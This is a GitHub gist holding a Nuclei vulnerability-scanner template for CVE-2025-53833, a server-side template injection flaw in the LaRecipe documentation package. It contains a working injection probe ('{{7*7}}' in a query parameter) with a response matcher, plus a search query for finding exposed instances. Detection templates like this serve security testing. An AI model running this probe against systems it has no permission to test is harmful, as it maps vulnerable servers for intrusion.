Skip to content

Instantly share code, notes, and snippets.

@bolhasec
Last active October 12, 2025 00:37
Show Gist options
  • Select an option

  • Save bolhasec/0baea7ce3e47531a49ecfa03e216defa to your computer and use it in GitHub Desktop.

Select an option

Save bolhasec/0baea7ce3e47531a49ecfa03e216defa to your computer and use it in GitHub Desktop.
Nuclei Template for CVE-2025-53833
id: CVE-2025-53833
info:
name: LaRecipe is vulnerable to Server-Side Template Injection attacks
author: sushicomabacate
severity: critical
description: |
LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations. Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration. Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch.
reference:
- https://www.cve.org/CVERecord?id=CVE-2025-53833
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-53833
cwe-id: CWE-1336
epss-score:
epss-percentile:
cpe: ---
metadata:
verified: true
max-request: 1
vendor: ----
product: ----
shodan-query: ----
fofa-query:
zoomeye-query: "LaRecipe"
hunter-query:
tags:
http:
- method: GET
path:
- "{{BaseURL}}/docs/1.0?poc={{7*7}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/docs/1.0?poc=49"
condition: and
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment